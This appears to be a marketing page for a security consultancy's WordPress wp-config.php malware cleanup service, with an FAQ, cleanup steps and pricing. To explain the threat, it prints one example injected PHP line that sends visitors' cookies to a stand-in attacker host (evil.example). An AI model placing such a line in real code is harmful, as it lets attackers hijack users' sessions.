How did wp-config.php get modified?

Either through a plugin vulnerability that allowed file writes, or via stolen SFTP/SSH credentials. The report names which.

Do I need to rotate my keys and salts?

Yes. We do this as part of every wp-config cleanup. Any session created before the rotation is invalidated automatically.

Can the attacker still read my data after the cleanup?

Not if the injection only touched wp-config — we remove their code, rotate keys, and check the database for related persistence. If they took a database dump while the injection was running, that data is gone; we tell you so in the report.

Should I restore from a backup instead?

Sometimes. If you have a clean pre-incident backup, restoring is fast. I can still do the forensic review and identify the entry vector so the same thing doesn’t happen to the restored site.

// WP-CONFIG.PHP · WORDPRESS · CLEANED

wp-config.php malware cleanup.

wp-config.php runs on every WordPress page load, which is why attackers love it. I pull out the injection, rotate the keys, and tell you what the attacker had access to. Flat $279.

Start a cleanup → How wp-config.php gets tampered

§ 01 — MECHANISM

wp-config.php is the worst place for an attacker to plant code.

wp-config.php loads on every WordPress request, before WordPress itself has a chance to filter anything. An attacker who modifies this file can execute code on every page, capture every login, or add hidden admin users that don’t appear in the dashboard.

Once wp-config.php has been touched, your salts, database password, and authentication keys must be considered compromised. I rotate everything as part of the cleanup. No extra invoice.

// wp-config.php — common injection pattern

01 02 // Legitimate wp-config starts with constants.
03 define('DB_NAME', 'wp_database');
04
05 // Injected — sends auth cookies to attacker on every request:
06 @file_get_contents("http://evil.example/c?d=" . $_COOKIE);

§ 02 — WHAT WE REMOVE

Every line, every key, every account.

[ TRIAGE ]

wp-config.php compared line-by-line against a clean baseline. Every non-standard line is reviewed.
[ WP-CONFIG ]

Injected code removed. Stray include/require lines pointing at unfamiliar files — audited and removed.
[ KEYS ]

AUTH_KEY, SECURE_AUTH_KEY, LOGGED_IN_KEY, NONCE_KEY and their salts rotated. All sessions invalidated.
[ DATABASE ]

Hidden admin users removed. wp_options autoloaded payloads audited for related persistence.
[ HARDENING ]

wp-config.php permissions tightened. .htaccess and Nginx rules added to deny direct access.
[ REPORT ]

Plain-English forensic write-up: what the attacker had access to, what was rotated, what you still need to do.

§ PRICE

Flat $279. One-time. Per site.

[ RESCUE ]

$279

FLAT · ONE-TIME · PER SITE

Manual cleanup, entry-vector identification, written forensic report.

Start a cleanup →

[ SHIELD ]

$29 / mo

PER SITE · CANCEL ANY TIME

Continuous monitoring, hardening, one cleanup per year included.

Get protected →

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

See all services →

Start an engagement.

Send the scope, stack, and timeline. You get a written proposal with a fixed quote.

Contact →